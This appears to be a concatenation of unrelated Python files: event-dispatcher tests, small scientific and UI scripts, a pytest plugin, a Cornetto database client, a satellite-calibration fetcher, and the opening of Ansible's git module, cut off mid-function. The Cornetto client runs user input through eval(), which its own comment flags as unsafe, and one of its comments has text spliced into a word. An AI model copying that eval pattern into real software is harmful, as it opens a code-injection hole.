    def test_from_handler(self):
        @event.event
        def handler():
            pass

        h_inst = event.HandlerInstance.from_handler(handler)
        assert h_inst.info is handler._h_info
        assert h_inst.enabled
        assert h_inst.handler is handler._h_info.handler

    def test_from_not_handler(self):
        def func():
            pass

        with pytest.raises(ValueError) as excinfo:
            event.HandlerInstance.from_handler(func)
        excinfo.match(r"Event handler must be decorated with `@event`")

    def test_hash(self):
        @event.event
        def handler():
            pass

        h_inst = event.HandlerInstance.from_handler(handler)
        h_inst2 = event.HandlerInstance.from_handler(handler)
        assert h_inst is not h_inst2
        assert hash(h_inst) == hash(h_inst2)
        assert h_inst != h_inst2


class TestResultSet:

    def test_extend(self, evt, loop):
        async def corofunc():
            pass

        coro = corofunc()
        coro2 = corofunc()
        # silence "coroutine never awaited" warnings
        loop.run_until_complete(coro)
        loop.run_until_complete(coro2)

        rval = event.ReturnValue(append_events=[evt])
        rval2 = event.ReturnValue(eat=True, schedule={coro})
        rval3 = event.ReturnValue(append_events=[evt], insert_events=[evt],
                                  schedule={coro, coro2})

        rset = event.ResultSet()
        rset2 = event.ResultSet()

        rset.extend(rval)
        assert not rset.eat
        assert rset.append_events == [evt]
        rset.extend(rval2)
        assert rset.eat
        assert rset.schedule == {coro}
        rset2.extend(rval3)
        rset.extend(rset2)
        rset.extend(None)
        assert rset.eat
        assert rset.append_events == [evt, evt]
        assert rset.insert_events == [evt]
        assert rset.schedule == {coro, coro2}

    def test_iadd(self, evt):
        rval = event.ReturnValue(append_events=[evt])
        rval2 = event.ReturnValue(eat=True, append_events=[evt])
        rset = event.ResultSet()

        rset += rval
        rset += rval2
        rset += None
        assert rset.eat
        assert rset.append_events == [evt, evt]

    def test_type(self):
        rset = event.ResultSet()
        with pytest.raises(NotImplementedError):
            rset.extend([])
        with pytest.raises(NotImplementedError):
            rset.extend(False)


class TestEventDispatcher:

    @pytest.fixture
    def dispatcher(self):
        return event.EventDispatcher()

    def test_register(self, dispatcher):
        name = "some_name"

        @event.event(name)
        async def corofunc(*args):
            return True

        h_inst = event.HandlerInstance.from_handler(corofunc)
        dispatcher.register(h_inst)
        assert h_inst in dispatcher.event_map["some_name"]

    def test_register_plugin(self, dispatcher):
        name = "some_name"

        class AClass:
            @event.event(name)
            def handler(self):
                pass

            @event.event(name)
            async def hander(self):
                pass

        obj = AClass()
        h_insts = dispatcher.register_plugin(obj)
        assert len(dispatcher.event_map) == 1
        assert len(h_insts) == 2
        for h_inst in h_insts:
            assert h_inst in dispatcher.event_map[name]

    def test_dispatch(self, dispatcher, loop):
        name = "some_name"
        args = dict(zip(map(str, range(10)), range(10, 20)))
        called = 0

        @event.event(name)
        async def corofunc(**local_args):
            nonlocal called
            assert local_args == args
            called += 1

        h_inst = event.HandlerInstance.from_handler(corofunc)
        dispatcher.register(h_inst)
        evt = event.Event(name, args)
        evt2 = evt._replace(name=evt.name + "_")
        loop.run_until_complete(dispatcher.dispatch(evt))
        loop.run_until_complete(dispatcher.dispatch(evt2))

        assert called == 1

    def test_dispatch_priority(self, dispatcher, loop, evt):
        called = list()

        @event.event(evt.name, priority=0)
        async def corofunc():
            called.append(corofunc)

        @event.event(evt.name, priority=1)
        def corofunc2():
            called.append(corofunc2)

        h_inst = event.HandlerInstance.from_handler(corofunc)
        h_inst2 = event.HandlerInstance.from_handler(corofunc2)
        dispatcher.register(h_inst)
        dispatcher.register(h_inst2)
        loop.run_until_complete(dispatcher.dispatch(evt))

        assert called == [corofunc2, corofunc]

    def test_dispatch_disabled(self, dispatcher, loop, evt):
        called = 0

        @event.event(evt.name, enable=False)
        async def corofunc():
            nonlocal called
            called += 1

        h_inst = event.HandlerInstance.from_handler(corofunc)
        dispatcher.register(h_inst)
        loop.run_until_complete(dispatcher.dispatch(evt))
        assert called == 0

    # TODO test disabled

    def test_dispatch_exception(self, loop, evt):
        logger = mock.Mock(Logger)
        dispatcher = event.EventDispatcher(logger=logger)
        called = 0

        @event.event(evt.name)
        async def corofunc():
            nonlocal called
            called += 1
            raise ValueError("yeah async")

        @event.event(evt.name)
        def handler():
            nonlocal called
            called += 1
            raise ValueError("yeah sync")

        dispatcher.register(event.HandlerInstance.from_handler(corofunc))
        dispatcher.register(event.HandlerInstance.from_handler(handler))
        assert not logger.exception.called
        loop.run_until_complete(dispatcher.dispatch(evt))
        assert called == 2
        assert logger.exception.call_count == 2

    def test_dispatch_unknown_return(self, loop, evt):
        logger = mock.Mock(Logger)
        dispatcher = event.EventDispatcher(logger=logger)
        called = False

        @event.event(evt.name)
        async def corofunc():
            nonlocal called
            called = True
            return "some arbitrary value"

        dispatcher.register(event.HandlerInstance.from_handler(corofunc))
        assert not logger.warning.called
        loop.run_until_complete(dispatcher.dispatch(evt))
        assert called
        assert logger.warning.call_count == 1

    def test_dispatch_eat(self, loop, evt):
        dispatcher = event.EventDispatcher()
        called = [False] * 3

        @event.event(evt.name, priority=1)
        def corofunc():
            called[0] = True

        @event.event(evt.name, priority=0)
        async def corofunc2():
            called[1] = True
            return event.ReturnValue(eat=True)

        @event.event(evt.name, priority=-1)
        async def corofunc3():
            called[2] = True

        dispatcher.register(event.HandlerInstance.from_handler(corofunc))
        dispatcher.register(event.HandlerInstance.from_handler(corofunc2))
        dispatcher.register(event.HandlerInstance.from_handler(corofunc3))
        result = loop.run_until_complete(dispatcher.dispatch(evt))
        assert result.eat
        assert called == [True, True, False]

    def test_dispatch_nested_insert(self, loop, evt):
        dispatcher = event.EventDispatcher()
        called = [0] * 3
        evt1 = evt
        evt2 = evt._replace(name=evt.name + "_")
        evt3 = evt._replace(name=evt.name + "__")

        @event.event(evt.name)
        def corofunc1():
            called[0] += 1
            return event.ReturnValue(insert_events=[evt2], append_events=[evt])

        @event.event(evt2.name)
        def corofunc2():
            called[1] += 1
            return event.ReturnValue(insert_events=[evt3], append_events=[evt2])

        @event.event(evt3.name)
        def corofunc3():
            called[2] += 1

            async def corofunc():
                pass

            return event.ReturnValue(append_events=[evt3], schedule={corofunc()})

        dispatcher.register(event.HandlerInstance.from_handler(corofunc1))
        dispatcher.register(event.HandlerInstance.from_handler(corofunc2))
        dispatcher.register(event.HandlerInstance.from_handler(corofunc3))
        result = loop.run_until_complete(dispatcher.dispatch(evt))
        assert called == [1, 1, 1]
        assert result.append_events == [evt1, evt2, evt3]
        assert len(result.schedule) == 1
        # prevent warnings again
        loop.run_until_complete(next(iter(result.schedule)))

    # TODO other ReturnValue tests

#!/usr/bin/env python3
from heapq import heapify, heappop, heappush


with open('NUOC.INP') as f:
    m, n = map(int, f.readline().split())
    height = [[int(i) for i in line.split()] for line in f]

queue = ([(h, 0, i) for i, h in enumerate(height[0])]
         + [(h, m - 1, i) for i, h in enumerate(height[-1])]
         + [(height[i][0], i, 0) for i in range(m)]
         + [(height[i][-1], i, n - 1) for i in range(m)])
heapify(queue)
visited = ([[True] * n]
           + [[True] + [False] * (n - 2) + [True] for _ in range(m - 2)]
           + [[True] * n])
result = 0

while queue:
    h, i, j = heappop(queue)    
    for x, y in (i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1):
        if 0 <= x < m and 0 <= y < n and not visited[x][y]:
            result += max(0, h - height[x][y])
            heappush(queue, (max(height[x][y], h), x, y))
            visited[x][y] = True

with open('NUOC.OUT', 'w') as f: print(result, file=f)

""" Loads hyperspy as a regular python library, creates a spectrum with random numbers and plots it to a file"""

import hyperspy.api as hs
import numpy as np
import matplotlib.pyplot as plt

s = hs.signals.Spectrum(np.random.rand(1024))
s.plot()

plt.savefig("testSpectrum.png")

import inspect
import re

import pytest

from robottelo.logging import collection_logger as logger

IMPORTANCE_LEVELS = []


def pytest_addoption(parser):
    """Add CLI options related to Testimony token based mark collection"""
    parser.addoption(
        '--importance',
        help='Comma separated list of importance levels to include in test collection',
    )
    parser.addoption(
        '--component',
        help='Comma separated list of component names to include in test collection',
    )
    parser.addoption(
        '--assignee',
        help='Comma separated list of assignees to include in test collection',
    )


def pytest_configure(config):
    """Register markers related to testimony tokens"""
    for marker in [
        'importance: CaseImportance testimony token, use --importance to filter',
        'component: Component testimony token, use --component to filter',
        'assignee: Assignee testimony token, use --assignee to filter',
    ]:
        config.addinivalue_line("markers", marker)


component_regex = re.compile(
    # To match :CaseComponent: FooBar
    r'\s*:CaseComponent:\s*(?P<component>\S*)',
    re.IGNORECASE,
)

importance_regex = re.compile(
    # To match :CaseImportance: Critical
    r'\s*:CaseImportance:\s*(?P<importance>\S*)',
    re.IGNORECASE,
)

assignee_regex = re.compile(
    # To match :Assignee: jsmith
    r'\s*:Assignee:\s*(?P<assignee>\S*)',
    re.IGNORECASE,
)


@pytest.hookimpl(tryfirst=True)
def pytest_collection_modifyitems(session, items, config):
    """Add markers for testimony tokens"""
    # split the option string and handle no option, single option, multiple
    # config.getoption(default) doesn't work like you think it does, hence or ''
    importance = [i for i in (config.getoption('importance') or '').split(',') if i != '']
    component = [c for c in (config.getoption('component') or '').split(',') if c != '']
    assignee = [a for a in (config.getoption('assignee') or '').split(',') if a != '']

    selected = []
    deselected = []
    logger.info('Processing test items to add testimony token markers')
    for item in items:
        if item.nodeid.startswith('tests/robottelo/'):
            # Unit test, no testimony markers
            continue

        # apply the marks for importance, component, and assignee
        # Find matches from docstrings starting at smallest scope
        item_docstrings = [
            d
            for d in map(inspect.getdoc, (item.function, getattr(item, 'cls', None), item.module))
            if d is not None
        ]
        item_mark_names = [m.name for m in item.iter_markers()]
        for docstring in item_docstrings:
            # Add marker starting at smallest docstring scope
            # only add the mark if it hasn't already been applied at a lower scope
            doc_component = component_regex.findall(docstring)
            if doc_component and 'component' not in item_mark_names:
                item.add_marker(pytest.mark.component(doc_component[0]))
            doc_importance = importance_regex.findall(docstring)
            if doc_importance and 'importance' not in item_mark_names:
                item.add_marker(pytest.mark.importance(doc_importance[0]))
            doc_assignee = assignee_regex.findall(docstring)
            if doc_assignee and 'assignee' not in item_mark_names:
                item.add_marker(pytest.mark.assignee(doc_assignee[0]))

        # exit early if no filters were passed
        if importance or component or assignee:
            # Filter test collection based on CLI options for filtering
            # filters should be applied together
            # such that --component Repository --importance Critical --assignee jsmith
            # only collects tests which have all three of these marks

            # https://github.com/pytest-dev/pytest/issues/1373  Will make this way easier
            # testimony requires both importance and component, this will blow up if its forgotten
            importance_marker = item.get_closest_marker('importance').args[0]
            if importance and importance_marker not in importance:
                logger.debug(
                    f'Deselected test {item.nodeid} due to "--importance {importance}",'
                    f'test has importance mark: {importance_marker}'
                )
                deselected.append(item)
                continue
            component_marker = item.get_closest_marker('component').args[0]
            if component and component_marker not in component:
                logger.debug(
                    f'Deselected test {item.nodeid} due to "--component {component}",'
                    f'test has component mark: {component_marker}'
                )
                deselected.append(item)
                continue
            assignee_marker = item.get_closest_marker('assignee').args[0]
            if assignee and assignee_marker not in assignee:
                logger.debug(
                    f'Deselected test {item.nodeid} due to "--assignee {assignee}",'
                    f'test has assignee mark: {assignee_marker}'
                )
                deselected.append(item)
                continue
            selected.append(item)

    # selected will be empty if no filter option was passed, defaulting to full items list
    items[:] = selected if deselected else items
    config.hook.pytest_deselected(items=deselected)

from feeluown.utils.dispatch import Signal
from feeluown.gui.widgets.my_music import MyMusicModel


class MyMusicItem(object):
    def __init__(self, text):
        self.text = text
        self.clicked = Signal()


class MyMusicUiManager:
    """

    .. note::

        目前，我们用数组的数据结构来保存 items，只提供 add_item 和 clear 方法。
        我们希望，MyMusic 中的 items 应该和 provider 保持关联。provider 是 MyMusic
        的上下文。

        而 Provider 是比较上层的对象，我们会提供 get_item 这种比较精细的控制方法。
    """
    def __init__(self, app):
        self._app = app
        self._items = []
        self.model = MyMusicModel(app)

    @classmethod
    def create_item(cls, text):
        return MyMusicItem(text)

    def add_item(self, item):
        self.model.add(item)
        self._items.append(item)

    def clear(self):
        self._items.clear()
        self.model.clear()

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Copyright (C) 2008-2013 by 
# Erwin Marsi and Tilburg University


# This file is part of the Pycornetto package.

# Pycornetto is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.

# Pycornetto is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""
A simple client to connect to the Cornetto database server.
Reads queries from standard input and writes results to standard output.
"""

# BUGS:
# - there is no way interrupt a query that goes bad on the server, as obviously
#   a local Ctrl-C does not work


__author__ = 'Erwin Marsi <e.marsi@gmail.com>'
__version__ = '0.6.1'

# using optparse instead of argparse so client can run stand-alone 
from sys import stdin, stdout, stderr, exit
from optparse import OptionParser, IndentedHelpFormatter
import xmlrpclib 
from pprint import pformat
from socket import error as SocketError



class MyFormatter(IndentedHelpFormatter):
    """to prevent optparse from messing up the epilog text"""
    
    def format_epilog(self, epilog):
        return epilog or ""
    
    def format_description(self, description):
        return description.lstrip()
    

epilog = """
Interactive usage:

  $ cornetto-client.py
  $ cornetto-client.py -a
  
File processing:

  $ echo 'ask("pijp")' | cornetto-client.py
  $ cornetto-client.py <input >output
"""

try:
    parser = OptionParser(description=__doc__, version="%(prog)s version " +
                          __version__, epilog=epilog, formatter=MyFormatter())
except TypeError:
    # optparse in python 2.4 has no epilog keyword
    parser = OptionParser(description=__doc__ + epilog, 
                          version="%(prog)s version " + __version__)
    
    


parser.add_option("-a", "--ask", action='store_true',
                  help="assume all commands are input the 'ask' function, "
                  "- so you can type 'query' instead of 'ask(\"query\") -  '"
                  "but online help is no longer accessible" )

parser.add_option("-H", "--host", default="localhost:5204",
                    metavar="HOST[:PORT]",
                    help="name or IP address of host (default is 'localhost') "
                    "optionally followed by a port number "
                    "(default is 5204)")

parser.add_option('-n', '--no-pretty-print', dest="pretty_print", action='store_false', 
                  help="turn off pretty printing of output "
                  "(default when standard input is a file)")

parser.add_option("-p", "--port", type=int, default=5204,
                  help='port number (default is 5204)')

parser.add_option('-P', '--pretty-print', dest="pretty_print", action='store_true', 
                  help="turn on pretty printing of output "
                  "(default when standard input is a tty)")


parser.add_option("-e", "--encoding", default="utf8", metavar="utf8,latin1,ascii,...",
                  help="character encoding of output (default is utf8)")

parser.add_option('-V', '--verbose', action='store_true', 
                  help="verbose output for debugging")


(opts, args) = parser.parse_args()


if opts.host.startswith("http://"):
    opts.host = opts.host[7:]

try:
    host, port = opts.host.split(":")[:2]
except ValueError:
    host, port = opts.host, None
    
# XMP-RPC requires specification of protocol
host = "http://" + (host or "localhost")

try:
    port = int(port or 5204)
except ValueError:
    exit("Error: %s is not a valid port number" % repr(port))

server = xmlrpclib.ServerProxy("%s:%s" %  (host, port),
                               encoding="utf-8",
                               verbose=opts.verbose)
try:
    eval('server.echo("test")')
except SocketError, inst:
    print >>stderr, "Error: %s\nCornetto server not running on %s:%s ?" % (
        inst, host, port), "See cornetto-server.py -h"
    exit(1)

    
help_text = """
Type "?" to see his message.
Type "help()" for help on available methods.
Type "Ctrl-D" to exit.
Restart with "cornetto-client.py -h" to see command line options.
"""

startup_msg = ( "cornetto-client.py (version %s)\n" % __version__ + 
                "Copyright (c) Erwin Marsi\n" + help_text )

    

if stdin.isatty():
    prompt = "$ "
    if opts.pretty_print is None:
        opts.pretty_print = True
    print startup_msg
else:
    prompt = ""
    if opts.pretty_print is None:
        opts.pretty_print = False
    
# use of eval might allow arbitrary code execution - probably not entirely safe    
if opts.ask:
    process = lambda c: eval('server.ask("%s")' % c.strip())
else:
    process = lambda c: eval("server." + c.strip())

if opts.pretty_print:
    formatter = pformat
else:
    formatter = repr

# This is nasty way to enforce encoleast_common_subsumers("fiets", "auto")ding of strings embedded in lists or dicts.
# For examample [u'plafonnière'] rather than [u"plafonni\xe8re"]
encoder = lambda s: s.decode("unicode_escape").encode(opts.encoding, "backslashreplace") 


while True:
    try:
        command = raw_input(prompt)
        if command == "?":
            print help_text
        else:
            result = process(command)
            print encoder(formatter(result))
    except EOFError:
        print "\nSee you later alligator!"
        exit(0)
    except KeyboardInterrupt:
        print >>stderr, "\nInterrupted. Latest command may still run on the server though..."
    except SyntaxError:
        print >>stderr, "Error: invalid syntax"
    except NameError, inst:
        print >>stderr, "Error:", inst, "- use quotes?"
    except xmlrpclib.Error, inst:
        print >>stderr, inst
    except SocketError:
        print >>stderr, "Error: %s\nCornetto server not running on %s:%s ?\n" % (
            inst, host, port), "See cornetto-server.py -h"


#from moderation import moderation
#from .models import SuccessCase


#moderation.register(SuccessCase)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy.  If not, see <http://www.gnu.org/licenses/>.
"""Fetch avhrr calibration coefficients."""
import datetime as dt
import os.path
import sys

import h5py
import urllib2

BASE_URL = "http://www.star.nesdis.noaa.gov/smcd/spb/fwu/homepage/" + \
           "AVHRR/Op_Cal_AVHRR/"

URLS = {
    "Metop-B":
    {"ch1": BASE_URL + "Metop1_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "Metop1_AVHRR_Libya_ch2.txt",
     "ch3a": BASE_URL + "Metop1_AVHRR_Libya_ch3a.txt"},
    "Metop-A":
    {"ch1": BASE_URL + "Metop2_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "Metop2_AVHRR_Libya_ch2.txt",
     "ch3a": BASE_URL + "Metop2_AVHRR_Libya_ch3a.txt"},
    "NOAA-16":
    {"ch1": BASE_URL + "N16_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "N16_AVHRR_Libya_ch2.txt"},
    "NOAA-17":
    {"ch1": BASE_URL + "N17_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "N17_AVHRR_Libya_ch2.txt",
     "ch3a": BASE_URL + "N17_AVHRR_Libya_ch3a.txt"},
    "NOAA-18":
    {"ch1": BASE_URL + "N18_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "N18_AVHRR_Libya_ch2.txt"},
    "NOAA-19":
    {"ch1": BASE_URL + "N19_AVHRR_Libya_ch1.txt",
     "ch2": BASE_URL + "N19_AVHRR_Libya_ch2.txt"}
}


def get_page(url):
    """Retrieve the given page."""
    return urllib2.urlopen(url).read()


def get_coeffs(page):
    """Parse coefficients from the page."""
    coeffs = {}
    coeffs['datetime'] = []
    coeffs['slope1'] = []
    coeffs['intercept1'] = []
    coeffs['slope2'] = []
    coeffs['intercept2'] = []

    slope1_idx, intercept1_idx, slope2_idx, intercept2_idx = \
        None, None, None, None

    date_idx = 0
    for row in page.lower().split('\n'):
        row = row.split()
        if len(row) == 0:
            continue
        if row[0] == 'update':
            # Get the column indices from the header line
            slope1_idx = row.index('slope_lo')
            intercept1_idx = row.index('int_lo')
            slope2_idx = row.index('slope_hi')
            intercept2_idx = row.index('int_hi')
            continue

        if slope1_idx is None:
            continue

        # In some cases the fields are connected, skip those rows
        if max([slope1_idx, intercept1_idx,
                slope2_idx, intercept2_idx]) >= len(row):
            continue

        try:
            dat = dt.datetime.strptime(row[date_idx], "%m/%d/%Y")
        except ValueError:
            continue

        coeffs['datetime'].append([dat.year, dat.month, dat.day])
        coeffs['slope1'].append(float(row[slope1_idx]))
        coeffs['intercept1'].append(float(row[intercept1_idx]))
        coeffs['slope2'].append(float(row[slope2_idx]))
        coeffs['intercept2'].append(float(row[intercept2_idx]))

    return coeffs


def get_all_coeffs():
    """Get all available calibration coefficients for the satellites."""
    coeffs = {}

    for platform in URLS:
        if platform not in coeffs:
            coeffs[platform] = {}
        for chan in URLS[platform].keys():
            url = URLS[platform][chan]
            print(url)
            page = get_page(url)
            coeffs[platform][chan] = get_coeffs(page)

    return coeffs


def save_coeffs(coeffs, out_dir=''):
    """Save calibration coefficients to HDF5 files."""
    for platform in coeffs.keys():
        fname = os.path.join(out_dir, "%s_calibration_data.h5" % platform)
        fid = h5py.File(fname, 'w')

        for chan in coeffs[platform].keys():
            fid.create_group(chan)
            fid[chan]['datetime'] = coeffs[platform][chan]['datetime']
            fid[chan]['slope1'] = coeffs[platform][chan]['slope1']
            fid[chan]['intercept1'] = coeffs[platform][chan]['intercept1']
            fid[chan]['slope2'] = coeffs[platform][chan]['slope2']
            fid[chan]['intercept2'] = coeffs[platform][chan]['intercept2']

        fid.close()
        print("Calibration coefficients saved for %s" % platform)


def main():
    """Create calibration coefficient files for AVHRR."""
    out_dir = sys.argv[1]
    coeffs = get_all_coeffs()
    save_coeffs(coeffs, out_dir=out_dir)


if __name__ == "__main__":
    main()

#!/usr/bin/python
# -*- coding: utf-8 -*-

# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function
__metaclass__ = type


DOCUMENTATION = '''
---
module: git
author:
    - "Ansible Core Team"
    - "Michael DeHaan"
version_added: "0.0.1"
short_description: Deploy software (or files) from git checkouts
description:
    - Manage I(git) checkouts of repositories to deploy files or software.
options:
    repo:
        description:
            - git, SSH, or HTTP(S) protocol address of the git repository.
        type: str
        required: true
        aliases: [ name ]
    dest:
        description:
            - The path of where the repository should be checked out. This
              is equivalent to C(git clone [repo_url] [directory]). The repository
              named in I(repo) is not appended to this path and the destination directory must be empty. This
              parameter is required, unless I(clone) is set to C(no).
        type: path
        required: true
    version:
        description:
            - What version of the repository to check out. This can be
              the literal string C(HEAD), a branch name, a tag name.
              It can also be a I(SHA-1) hash, in which case I(refspec) needs
              to be specified if the given revision is not already available.
        type: str
        default: "HEAD"
    accept_hostkey:
        description:
            - If C(yes), ensure that "-o StrictHostKeyChecking=no" is
              present as an ssh option.
        type: bool
        default: 'no'
        version_added: "1.5"
    accept_newhostkey:
        description:
            - As of OpenSSH 7.5, "-o StrictHostKeyChecking=accept-new" can be
              used which is safer and will only accepts host keys which are
              not present or are the same. if C(yes), ensure that
              "-o StrictHostKeyChecking=accept-new" is present as an ssh option.
        type: bool
        default: 'no'
        version_added: "2.12"
    ssh_opts:
        description:
            - Creates a wrapper script and exports the path as GIT_SSH
              which git then automatically uses to override ssh arguments.
              An example value could be "-o StrictHostKeyChecking=no"
              (although this particular option is better set by
              I(accept_hostkey)).
        type: str
        version_added: "1.5"
    key_file:
        description:
            - Specify an optional private key file path, on the target host, to use for the checkout.
        type: path
        version_added: "1.5"
    reference:
        description:
            - Reference repository (see "git clone --reference ...").
        version_added: "1.4"
    remote:
        description:
            - Name of the remote.
        type: str
        default: "origin"
    refspec:
        description:
            - Add an additional refspec to be fetched.
              If version is set to a I(SHA-1) not reachable from any branch
              or tag, this option may be necessary to specify the ref containing
              the I(SHA-1).
              Uses the same syntax as the C(git fetch) command.
              An example value could be "refs/meta/config".
        type: str
        version_added: "1.9"
    force:
        description:
            - If C(yes), any modified files in the working
              repository will be discarded.  Prior to 0.7, this was always
              'yes' and could not be disabled.  Prior to 1.9, the default was
              `yes`.
        type: bool
        default: 'no'
        version_added: "0.7"
    depth:
        description:
            - Create a shallow clone with a history truncated to the specified
              number or revisions. The minimum possible value is C(1), otherwise
              ignored. Needs I(git>=1.9.1) to work correctly.
        type: int
        version_added: "1.2"
    clone:
        description:
            - If C(no), do not clone the repository even if it does not exist locally.
        type: bool
        default: 'yes'
        version_added: "1.9"
    update:
        description:
            - If C(no), do not retrieve new revisions from the origin repository.
            - Operations like archive will work on the existing (old) repository and might
              not respond to changes to the options version or remote.
        type: bool
        default: 'yes'
        version_added: "1.2"
    executable:
        description:
            - Path to git executable to use. If not supplied,
              the normal mechanism for resolving binary paths will be used.
        type: path
        version_added: "1.4"
    bare:
        description:
            - If C(yes), repository will be created as a bare repo, otherwise
              it will be a standard repo with a workspace.
        type: bool
        default: 'no'
        version_added: "1.4"
    umask:
        description:
            - The umask to set before doing any checkouts, or any other
              repository maintenance.
        type: raw
        version_added: "2.2"

    recursive:
        description:
            - If C(no), repository will be cloned without the --recursive
              option, skipping sub-modules.
        type: bool
        default: 'yes'
        version_added: "1.6"

    single_branch:
        description:
            - Clone only the history leading to the tip of the specified I(branch).
        type: bool
        default: 'no'
        version_added: '2.11'

    track_submodules:
        description:
            - If C(yes), submodules will track the latest commit on their
              master branch (or other branch specified in .gitmodules).  If
              C(no), submodules will be kept at the revision specified by the
              main project. This is equivalent to specifying the --remote flag
              to git submodule update.
        type: bool
        default: 'no'
        version_added: "1.8"

    verify_commit:
        description:
            - If C(yes), when cloning or checking out a I(version) verify the
              signature of a GPG signed commit. This requires git version>=2.1.0
              to be installed. The commit MUST be signed and the public key MUST
              be present in the GPG keyring.
        type: bool
        default: 'no'
        version_added: "2.0"

    archive:
        description:
            - Specify archive file path with extension. If specified, creates an
              archive file of the specified format containing the tree structure
              for the source tree.
              Allowed archive formats ["zip", "tar.gz", "tar", "tgz"].
            - This will clone and perform git archive from local directory as not
              all git servers support git archive.
        type: path
        version_added: "2.4"

    archive_prefix:
        description:
            - Specify a prefix to add to each file path in archive. Requires I(archive) to be specified.
        version_added: "2.10"
        type: str

    separate_git_dir:
        description:
            - The path to place the cloned repository. If specified, Git repository
              can be separated from working tree.
        type: path
        version_added: "2.7"

    gpg_whitelist:
        description:
           - A list of trusted GPG fingerprints to compare to the fingerprint of the
             GPG-signed commit.
           - Only used when I(verify_commit=yes).
           - Use of this feature requires Git 2.6+ due to its reliance on git's C(--raw) flag to C(verify-commit) and C(verify-tag).
        type: list
        elements: str
        default: []
        version_added: "2.9"

requirements:
    - git>=1.7.1 (the command line tool)

notes:
    - "If the task seems to be hanging, first verify remote host is in C(known_hosts).
      SSH will prompt user to authorize the first contact with a remote host.  To avoid this prompt,
      one solution is to use the option accept_hostkey. Another solution is to
      add the remote host public key in C(/etc/ssh/ssh_known_hosts) before calling
      the git module, with the following command: ssh-keyscan -H remote_host.com >> /etc/ssh/ssh_known_hosts."
    - Supports C(check_mode).
'''

EXAMPLES = '''
- name: Git checkout
  ansible.builtin.git:
    repo: 'https://foosball.example.org/path/to/repo.git'
    dest: /srv/checkout
    version: release-0.22

- name: Read-write git checkout from github
  ansible.builtin.git:
    repo: git@github.com:mylogin/hello.git
    dest: /home/mylogin/hello

- name: Just ensuring the repo checkout exists
  ansible.builtin.git:
    repo: 'https://foosball.example.org/path/to/repo.git'
    dest: /srv/checkout
    update: no

- name: Just get information about the repository whether or not it has already been cloned locally
  ansible.builtin.git:
    repo: 'https://foosball.example.org/path/to/repo.git'
    dest: /srv/checkout
    clone: no
    update: no

- name: Checkout a github repo and use refspec to fetch all pull requests
  ansible.builtin.git:
    repo: https://github.com/ansible/ansible-examples.git
    dest: /src/ansible-examples
    refspec: '+refs/pull/*:refs/heads/*'

- name: Create git archive from repo
  ansible.builtin.git:
    repo: https://github.com/ansible/ansible-examples.git
    dest: /src/ansible-examples
    archive: /tmp/ansible-examples.zip

- name: Clone a repo with separate git directory
  ansible.builtin.git:
    repo: https://github.com/ansible/ansible-examples.git
    dest: /src/ansible-examples
    separate_git_dir: /src/ansible-examples.git

- name: Example clone of a single branch
  ansible.builtin.git:
    single_branch: yes
    branch: master

- name: Avoid hanging when http(s) password is missing
  ansible.builtin.git:
    repo: https://github.com/ansible/could-be-a-private-repo
    dest: /src/from-private-repo
  environment:
    GIT_TERMINAL_PROMPT: 0 # reports "terminal prompts disabled" on missing password
    # or GIT_ASKPASS: /bin/true # for git before version 2.3.0, reports "Authentication failed" on missing password
'''

RETURN = '''
after:
    description: Last commit revision of the repository retrieved during the update.
    returned: success
    type: str
    sample: 4c020102a9cd6fe908c9a4a326a38f972f63a903
before:
    description: Commit revision before the repository was updated, "null" for new repository.
    returned: success
    type: str
    sample: 67c04ebe40a003bda0efb34eacfb93b0cafdf628
remote_url_changed:
    description: Contains True or False whether or not the remote URL was changed.
    returned: success
    type: bool
    sample: True
warnings:
    description: List of warnings if requested features were not available due to a too old git version.
    returned: error
    type: str
    sample: git version is too old to fully support the depth argument. Falling back to full checkouts.
git_dir_now:
    description: Contains the new path of .git directory if it is changed.
    returned: success
    type: str
    sample: /path/to/new/git/dir
git_dir_before:
    description: Contains the original path of .git directory if it is changed.
    returned: success
    type: str
    sample: /path/to/old/git/dir
'''

import filecmp
import os
import re
import shlex
import stat
import sys
import shutil
import tempfile
from distutils.version import LooseVersion

from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import b, string_types
from ansible.module_utils._text import to_native, to_text
from ansible.module_utils.common.process import get_bin_path


def relocate_repo(module, result, repo_dir, old_repo_dir, worktree_dir):
    if os.path.exists(repo_dir):
        module.fail_json(msg='Separate-git-dir path %s already exists.' % repo_dir)
    if worktree_dir:
        dot_git_file_path = os.path.join(worktree_dir, '.git')
        try:
            shutil.move(old_repo_dir, repo_dir)
            with open(dot_git_file_path, 'w') as dot_git_file:
                dot_git_file.write('gitdir: %s' % repo_dir)
            result['git_dir_before'] = old_repo_dir
            result['git_dir_now'] = repo_dir
        except (IOError, OSError) as err:
            # if we already moved the .git dir, roll it back
            if os.path.exists(repo_dir):
                shutil.move(repo_dir, old_repo_dir)
            module.fail_json(msg=u'Unable to move git dir. %s' % to_text(err))


def head_splitter(headfile, remote, module=None, fail_on_error=False):
    '''Extract the head reference'''
    # https://github.com/ansible/ansible-modules-core/pull/907

    res = None
    if os.path.exists(headfile):
        rawdata = None
        try:
